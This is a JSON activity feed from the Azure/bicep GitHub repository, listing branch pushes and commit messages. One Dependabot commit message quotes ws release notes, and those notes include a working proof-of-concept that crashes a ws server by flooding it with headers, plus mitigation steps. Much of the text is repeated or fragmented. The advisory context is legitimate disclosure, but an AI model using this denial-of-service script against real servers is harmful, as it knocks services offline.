{"payload":{"feedbackUrl":"https://github.com/orgs/community/discussions/53140","repo":{"id":263503250,"defaultBranch":"main","name":"bicep","ownerLogin":"Azure","currentUserCanPush":false,"isFork":false,"isEmpty":false,"createdAt":"2020-05-13T02:18:30.000Z","ownerAvatar":"https://avatars.githubusercontent.com/u/6844498?v=4","public":true,"private":false,"isOrgOwned":true},"refInfo":{"name":"","listCacheKey":"v0:1718987447.0","currentOid":""},"activityList":{"items":[{"before":"8191dc878cd65720b33bea5f49bdf2fc5c47fac4","after":"c33d26363178f0bbff4a989733dad5117a3b79e0","ref":"refs/heads/jasondou/microsoftgraph-0624","pushedAt":"2024-06-21T16:46:33.000Z","pushType":"push","commitsCount":1,"pusher":{"login":"jason-dou","name":"Jason Dou","path":"/jason-dou","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/85079049?s=80&v=4"},"commit":{"message":"Update package hash","shortMessageHtmlLink":"Update package hash"}},{"before":null,"after":"8191dc878cd65720b33bea5f49bdf2fc5c47fac4","ref":"refs/heads/jasondou/microsoftgraph-0624","pushedAt":"2024-06-21T16:30:47.000Z","pushType":"branch_creation","commitsCount":0,"pusher":{"login":"jason-dou","name":"Jason Dou","path":"/jason-dou","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/85079049?s=80&v=4"},"commit":{"message":"Update Microsoft Graph Bicep Types","shortMessageHtmlLink":"Update Microsoft Graph Bicep Types"}},{"before":"19bddfdd5b4be1b2c3dd397dcd265ec56ebf4210","after":"70ac99d94dd063727da13150189ddcf29d031f8e","ref":"refs/heads/shenglol/provider-to-extension","pushedAt":"2024-06-21T03:18:01.000Z","pushType":"push","commitsCount":1,"pusher":{"login":"shenglol","name":"Shenglong Li","path":"/shenglol","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/16367959?s=80&v=4"},"commit":{"message":"Update keyword","shortMessageHtmlLink":"Update keyword"}},{"before":null,"after":"19bddfdd5b4be1b2c3dd397dcd265ec56ebf4210","ref":"refs/heads/shenglol/provider-to-extension","pushedAt":"2024-06-20T23:22:55.000Z","pushType":"branch_creation","commitsCount":0,"pusher":{"login":"shenglol","name":"Shenglong Li","path":"/shenglol","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/16367959?s=80&v=4"},"commit":{"message":"Replace provider with extension","shortMessageHtmlLink":"Replace provider with extension"}},{"before":"a2741e45696707157c83d5e7dc6b3b126b1929b1","after":"771389c9c1558ea82129ac8552396b29b6db7bf6","ref":"refs/heads/ant/grpc","pushedAt":"2024-06-20T01:55:42.000Z","pushType":"force_push","commitsCount":0,"pusher":{"login":"anthony-c-martin","name":"Anthony Martin","path":"/anthony-c-martin","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/38542602?s=80&v=4"},"commit":{"message":"Partially working","shortMessageHtmlLink":"Partially working"}},{"before":"89af644812fd5588343464e1ea49703bb0b77476","after":"a2741e45696707157c83d5e7dc6b3b126b1929b1","ref":"refs/heads/ant/grpc","pushedAt":"2024-06-20T01:44:02.000Z","pushType":"force_push","commitsCount":0,"pusher":{"login":"anthony-c-martin","name":"Anthony Martin","path":"/anthony-c-martin","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/38542602?s=80&v=4"},"commit":{"message":"Partially working","shortMessageHtmlLink":"Partially working"}},{"before":"28c3da63bbfc10250905ba13b4343ce96b5d43ff","after":null,"ref":"refs/heads/majastrz/type-highlighting","pushedAt":"2024-06-20T01:37:12.000Z","pushType":"branch_deletion","commitsCount":0,"pusher":{"login":"majastrz","name":"Marcin Jastrzebski","path":"/majastrz","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/22460039?s=80&v=4"}},{"before":"bf8a3449001d797747dfcf7971751351e59fcbae","after":"e307d17ca9420eec3673efcd1bfc73f3b33061ec","ref":"refs/heads/main","pushedAt":"2024-06-20T01:37:11.000Z","pushType":"pr_merge","commitsCount":1,"pusher":{"login":"majastrz","name":"Marcin Jastrzebski","path":"/majastrz","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/22460039?s=80&v=4"},"commit":{"message":"Fixed UDT syntax highlighting (#14372)\n\nFixed the recent regression in syntax highlighting for user defined\r\ntypes:\r\n* Now emitting `SemanticTokenType.Namespace` for namespace symbols.\r\n* Now emitting `SemanticTokenType.Type` for `TypeVariableAccessSyntax`\r\nthat resolves to a valid type symbol.\r\n* Now emitting `SemanticTokenType.Keyword` for `null`, `true` and\r\n`false` type keywords.\r\n\r\nExamples of changes:\r\n\r\n\r\nI will look into adding tests separately since we don't currently have\r\nbaselines or meaningful unit tests for syntax highlighting. (I recall we\r\nhad some issues with that in the past, but will need to confirm.)\r\n\r\nThis fixes #14147\r\n###### Microsoft Reviewers: [Open in\r\nCodeFlow](https://microsoft.github.io/open-pr/?codeflow=https://github.com/Azure/bicep/pull/14372)","shortMessageHtmlLink":"Fixed UDT syntax highlighting (#14372)"}},{"before":"8985fd23db982fcd2324c51801a3fd74adb3534a","after":"9841a6698253c112627c9d0acd048ad6af18fe35","ref":"refs/heads/enpolat/12019-design-proposal-modular-parameters","pushedAt":"2024-06-20T00:12:27.000Z","pushType":"push","commitsCount":1,"pusher":{"login":"polatengin","name":"Engin Polat","path":"/polatengin","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/118744?s=80&v=4"},"commit":{"message":"addressing a comment on the PR","shortMessageHtmlLink":"addressing a comment on the PR"}},{"before":"019d9d791761a58408338a469b0f8e03faba8a68","after":"8985fd23db982fcd2324c51801a3fd74adb3534a","ref":"refs/heads/enpolat/12019-design-proposal-modular-parameters","pushedAt":"2024-06-20T00:05:11.000Z","pushType":"push","commitsCount":1,"pusher":{"login":"polatengin","name":"Engin Polat","path":"/polatengin","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/118744?s=80&v=4"},"commit":{"message":"renaming to empty semantic model","shortMessageHtmlLink":"renaming to empty semantic model"}},{"before":"3998f5ac2fad844fd935434b8ae8efbab9299621","after":"019d9d791761a58408338a469b0f8e03faba8a68","ref":"refs/heads/enpolat/12019-design-proposal-modular-parameters","pushedAt":"2024-06-20T00:01:38.000Z","pushType":"push","commitsCount":1,"pusher":{"login":"polatengin","name":"Engin Polat","path":"/polatengin","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/118744?s=80&v=4"},"commit":{"message":"simplifying if statement","shortMessageHtmlLink":"simplifying if statement"}},{"before":"87b53bbed659e2018d5723310e1e5a07adeb1524","after":"28c3da63bbfc10250905ba13b4343ce96b5d43ff","ref":"refs/heads/majastrz/type-highlighting","pushedAt":"2024-06-19T19:45:43.000Z","pushType":"push","commitsCount":1,"pusher":{"login":"majastrz","name":"Marcin Jastrzebski","path":"/majastrz","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/22460039?s=80&v=4"},"commit":{"message":"additional highlight fixes","shortMessageHtmlLink":"additional highlight fixes"}},{"before":"bf8a3449001d797747dfcf7971751351e59fcbae","after":"87b53bbed659e2018d5723310e1e5a07adeb1524","ref":"refs/heads/majastrz/type-highlighting","pushedAt":"2024-06-19T00:57:02.000Z","pushType":"push","commitsCount":1,"pusher":{"login":"majastrz","name":"Marcin Jastrzebski","path":"/majastrz","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/22460039?s=80&v=4"},"commit":{"message":"fixed type highlights","shortMessageHtmlLink":"fixed type highlights"}},{"before":null,"after":"bf8a3449001d797747dfcf7971751351e59fcbae","ref":"refs/heads/majastrz/type-highlighting","pushedAt":"2024-06-18T17:57:50.000Z","pushType":"branch_creation","commitsCount":0,"pusher":{"login":"majastrz","name":"Marcin Jastrzebski","path":"/majastrz","primaryAvatarUrl":"https://avatars.githubusercontent.com/u/22460039?s=80&v=4"},"commit":{"message":"Bump @typescript-eslint/parser from 7.12.0 to 7.13.0 in /src/highlightjs (#14340)\n\nBumps\r\n[@typescript-eslint/parser](https://github.com/typescript-eslint/typescript-eslint/tree/HEAD/packages/parser)\r\nfrom 7.12.0 to 7.13.0.\r\n Sourced from You can read about our versioning\r\nstrategy and releases\r\non our website. Sourced from You can read about our versioning\r\nstrategy and releases\r\non our website. Sourced from You can read about our versioning\r\nstrategy and releases\r\non our website. Sourced from You can read about our versioning\r\nstrategy and releases\r\non our website. Sourced from ws's\r\nreleases. Sourced from ws's\r\nreleases. A request with a number of headers exceeding\r\nthe[ const wss = new WebSocket.Server({ port: 0 }, function () {\r\nconst chars =\r\n"!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');\r\nconst headers = {};\r\nlet count = 0; for (let i = 0; i < chars.length; i++) {\r\nif (count === 2000) break; } headers.Connection = 'Upgrade';\r\nheaders.Upgrade = 'websocket';\r\nheaders['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';\r\nheaders['Sec-WebSocket-Version'] = '13'; const request = http.request({\r\nheaders: headers,\r\nhost: '127.0.0.1',\r\nport: wss.address().port\r\n}); request.end();\r\n});\r\nRelease notes
\r\n@typescript-eslint/parser
's\r\nreleases.\r\n
\r\nv7.13.0
\r\n7.13.0 (2024-06-10)
\r\n🚀 Features
\r\n\r\n
\r\nimport =\r\nrequire()
argument to be a string literal (#9226).body
,\r\n.async
, .generator
on declare\r\nfunction
(#9225)🩹 Fixes
\r\n\r\n
\r\nignore
option (#9167)❤️ Thank You
\r\n\r\n
\r\n@tobySolutions
@yeonjuan
Changelog
\r\n@typescript-eslint/parser
's\r\nchangelog.\r\n
\r\n7.13.0 (2024-06-10)
\r\n🚀 Features
\r\n\r\n
\r\n❤️ Thank You
\r\n\r\n
\r\nCommits
\r\n\r\n
\r\n8a178ed
\r\nchore(release): publish 7.13.0c9a6dd9
\r\nfeat(parser, typescript-estree): export withoutProjectParserOptions\r\nutility (...
\r\n\r\n\r\n[![Dependabot compatibility\r\nscore](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=@typescript-eslint/parser&package-manager=npm_and_yarn&previous-version=7.12.0&new-version=7.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\r\n\r\nDependabot will resolve any conflicts with this PR as long as you don't\r\nalter it yourself. You can also trigger a rebase manually by commenting\r\n`@dependabot rebase`.\r\n\r\n[//]: # (dependabot-automerge-start)\r\n[//]: # (dependabot-automerge-end)\r\n\r\n---\r\n\r\nDependabot commands and options
\r\n
\r\n\r\nYou can trigger Dependabot actions by commenting on this PR:\r\n- `@dependabot rebase` will rebase this PR\r\n- `@dependabot recreate` will recreate this PR, overwriting any edits\r\nthat have been made to it\r\n- `@dependabot merge` will merge this PR after your CI passes on it\r\n- `@dependabot squash and merge` will squash and merge this PR after\r\nyour CI passes on it\r\n- `@dependabot cancel merge` will cancel a previously requested merge\r\nand block automerging\r\n- `@dependabot reopen` will reopen this PR if it is closed\r\n- `@dependabot close` will close this PR and stop Dependabot recreating\r\nit. You can achieve the same result by closing it manually\r\n- `@dependabot show Release notes
\r\n@typescript-eslint/parser
's\r\nreleases.\r\n
\r\nv7.13.0
\r\n7.13.0 (2024-06-10)
\r\n🚀 Features
\r\n\r\n
\r\nimport =\r\nrequire()
argument to be a string literal (#9226).body
,\r\n.async
, .generator
on declare\r\nfunction
(#9225)🩹 Fixes
\r\n\r\n
\r\nignore
option (#9167)❤️ Thank You
\r\n\r\n
\r\n@tobySolutions
@yeonjuan
Changelog
\r\n@typescript-eslint/parser
's\r\nchangelog.\r\n
\r\n7.13.0 (2024-06-10)
\r\n🚀 Features
\r\n\r\n
\r\n❤️ Thank You
\r\n\r\n
\r\nCommits
\r\n\r\n
\r\n8a178ed
\r\nchore(release): publish 7.13.0c9a6dd9
\r\nfeat(parser, typescript-estree): export withoutProjectParserOptions\r\nutility (...
\r\n\r\n\r\n[![Dependabot compatibility\r\nscore](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=@typescript-eslint/parser&package-manager=npm_and_yarn&previous-version=7.12.0&new-version=7.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\r\n\r\nDependabot will resolve any conflicts with this PR as long as you don't\r\nalter it yourself. You can also trigger a rebase manually by commenting\r\n`@dependabot rebase`.\r\n\r\n[//]: # (dependabot-automerge-start)\r\n[//]: # (dependabot-automerge-end)\r\n\r\n---\r\n\r\nDependabot commands and options
\r\n
\r\n\r\nYou can trigger Dependabot actions by commenting on this PR:\r\n- `@dependabot rebase` will rebase this PR\r\n- `@dependabot recreate` will recreate this PR, overwriting any edits\r\nthat have been made to it\r\n- `@dependabot merge` will merge this PR after your CI passes on it\r\n- `@dependabot squash and merge` will squash and merge this PR after\r\nyour CI passes on it\r\n- `@dependabot cancel merge` will cancel a previously requested merge\r\nand block automerging\r\n- `@dependabot reopen` will reopen this PR if it is closed\r\n- `@dependabot close` will close this PR and stop Dependabot recreating\r\nit. You can achieve the same result by closing it manually\r\n- `@dependabot show Release notes
\r\n\r\n
\r\n7.5.10
\r\nBug fixes
\r\n\r\n
\r\n7.5.9
\r\nBug fixes
\r\n\r\n
\r\n7.5.8
\r\nBug fixes
\r\n\r\n
\r\nCommits
\r\n\r\n
\r\nd962d70
\r\n[dist] 7.5.1022c2876
\r\n[security] Fix crash when the Upgrade header cannot be read (#2231)8a78f87
\r\n[dist] 7.5.90435e6e
\r\n[security] Fix same host check for ws+unix: redirects4271f07
\r\n[dist] 7.5.8dc1781b
\r\n[security] Drop sensitive headers when following insecure redirects2758ed3
\r\n[fix] Abort the handshake if the Upgrade header is invalid
\r\n\r\n\r\n[![Dependabot compatibility\r\nscore](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=ws&package-manager=npm_and_yarn&previous-version=7.5.7&new-version=7.5.10)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\r\n\r\nDependabot will resolve any conflicts with this PR as long as you don't\r\nalter it yourself. You can also trigger a rebase manually by commenting\r\n`@dependabot rebase`.\r\n\r\n[//]: # (dependabot-automerge-start)\r\n[//]: # (dependabot-automerge-end)\r\n\r\n---\r\n\r\nDependabot commands and options
\r\n
\r\n\r\nYou can trigger Dependabot actions by commenting on this PR:\r\n- `@dependabot rebase` will rebase this PR\r\n- `@dependabot recreate` will recreate this PR, overwriting any edits\r\nthat have been made to it\r\n- `@dependabot merge` will merge this PR after your CI passes on it\r\n- `@dependabot squash and merge` will squash and merge this PR after\r\nyour CI passes on it\r\n- `@dependabot cancel merge` will cancel a previously requested merge\r\nand block automerging\r\n- `@dependabot reopen` will reopen this PR if it is closed\r\n- `@dependabot close` will close this PR and stop Dependabot recreating\r\nit. You can achieve the same result by closing it manually\r\n- `@dependabot show Release notes
\r\n\r\n
8.17.1
\r\nBug fixes
\r\n\r\n
\r\nserver.maxHeadersCount
][]\r\nthreshold could be used to crash a ws server.const http = require('http');\r\nconst WebSocket = require('ws');\r\n
\r\nfor (let j = 0; j < chars.length; j++) {\r\n const key = chars[i] + chars[j];\r\n headers[key] = 'x';\r\n\r\n if (++count === 2000) break;\r\n}\r\n
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
\r\nIn vulnerable versions of ws, the issue can be mitigated in the\r\nfollowing ways:
\r\n--max-http-header-size=size
][] and/or the\r\n[maxHeaderSize
][] options so\r\nthat no more headers than the server.maxHeadersCount
limit\r\ncan be sent.... (truncated)
\r\n\r\n3c56601
\r\n[dist] 8.17.1e55e510
\r\n[security] Fix crash when the Upgrade header cannot be read (#2231)6a00029
\r\n[test] Increase code coverageddfe4a8
\r\n[perf] Reduce the amount of crypto.randomFillSync()
\r\ncallsb73b118
\r\n[dist] 8.17.029694a5
\r\n[test] Use the highWaterMark
variable934c9d6
\r\n[ci] Test on node 221817bac
\r\n[ci] Do not test on node 2196c9b3d
\r\n[major] Flip the default value of allowSynchronousEvents
\r\n(#2221)e5f32c7
\r\n[fix] Emit at most one event per event loop iteration (#2218)Sourced from ws's\nreleases.
\n\n\n8.17.1
\nBug fixes
\n\n
\n- Fixed a DoS vulnerability (#2231).
\nA request with a number of headers exceeding\nthe[
\nserver.maxHeadersCount
][]\nthreshold could be used to crash a ws server.\nconst http = require('http');\nconst WebSocket = require('ws');\n
const wss = new WebSocket.Server({ port: 0 }, function () {\nconst chars =\n"!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');\nconst headers = {};\nlet count = 0;
\nfor (let i = 0; i < chars.length; i++) {\nif (count === 2000) break;
\n\nfor (let j = 0; j < chars.length; j++) {\n const key = chars[i] + chars[j];\n headers[key] = 'x';\n\n if (++count === 2000) break;\n}\n
}
\nheaders.Connection = 'Upgrade';\nheaders.Upgrade = 'websocket';\nheaders['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';\nheaders['Sec-WebSocket-Version'] = '13';
\nconst request = http.request({\nheaders: headers,\nhost: '127.0.0.1',\nport: wss.address().port\n});
\nrequest.end();\n});\n
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
\nIn vulnerable versions of ws, the issue can be mitigated in the\nfollowing ways:
\n\n
\n\n- Reduce the maximum allowed length of the request headers using the\n[
\n--max-http-header-size=size
][] and/or the\n[maxHeaderSize
][] options so\nthat no more headers than theserver.maxHeadersCount
limit\ncan be sent.
... (truncated)
\n3c56601
\n[dist] 8.17.1e55e510
\n[security] Fix crash when the Upgrade header cannot be read (#2231)6a00029
\n[test] Increase code coverageddfe4a8
\n[perf] Reduce the amount of crypto.randomFillSync()
\ncallsb73b118
\n[dist] 8.17.029694a5
\n[test] Use the highWaterMark
variable934c9d6
\n[ci] Test on node 221817bac
\n[ci] Do not test on node 2196c9b3d
\n[major] Flip the default value of allowSynchronousEvents
\n(#2221)e5f32c7
\n[fix] Emit at most one event per event loop iteration (#2218)Sourced from ws's\nreleases.
\n\n\n8.17.1
\nBug fixes
\n\n
\n- Fixed a DoS vulnerability (#2231).
\nA request with a number of headers exceeding\nthe[
\nserver.maxHeadersCount
][]\nthreshold could be used to crash a ws server.\nconst http = require('http');\nconst WebSocket = require('ws');\n
const wss = new WebSocket.Server({ port: 0 }, function () {\nconst chars =\n"!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');\nconst headers = {};\nlet count = 0;
\nfor (let i = 0; i < chars.length; i++) {\nif (count === 2000) break;
\n\nfor (let j = 0; j < chars.length; j++) {\n const key = chars[i] + chars[j];\n headers[key] = 'x';\n\n if (++count === 2000) break;\n}\n
}
\nheaders.Connection = 'Upgrade';\nheaders.Upgrade = 'websocket';\nheaders['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';\nheaders['Sec-WebSocket-Version'] = '13';
\nconst request = http.request({\nheaders: headers,\nhost: '127.0.0.1',\nport: wss.address().port\n});
\nrequest.end();\n});\n
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
\nIn vulnerable versions of ws, the issue can be mitigated in the\nfollowing ways:
\n\n
\n\n- Reduce the maximum allowed length of the request headers using the\n[
\n--max-http-header-size=size
][] and/or the\n[maxHeaderSize
][] options so\nthat no more headers than theserver.maxHeadersCount
limit\ncan be sent.
... (truncated)
\n3c56601
\n[dist] 8.17.1e55e510
\n[security] Fix crash when the Upgrade header cannot be read (#2231)6a00029
\n[test] Increase code coverageddfe4a8
\n[perf] Reduce the amount of crypto.randomFillSync()
\ncallsb73b118
\n[dist] 8.17.029694a5
\n[test] Use the highWaterMark
variable934c9d6
\n[ci] Test on node 221817bac
\n[ci] Do not test on node 2196c9b3d
\n[major] Flip the default value of allowSynchronousEvents
\n(#2221)e5f32c7
\n[fix] Emit at most one event per event loop iteration (#2218)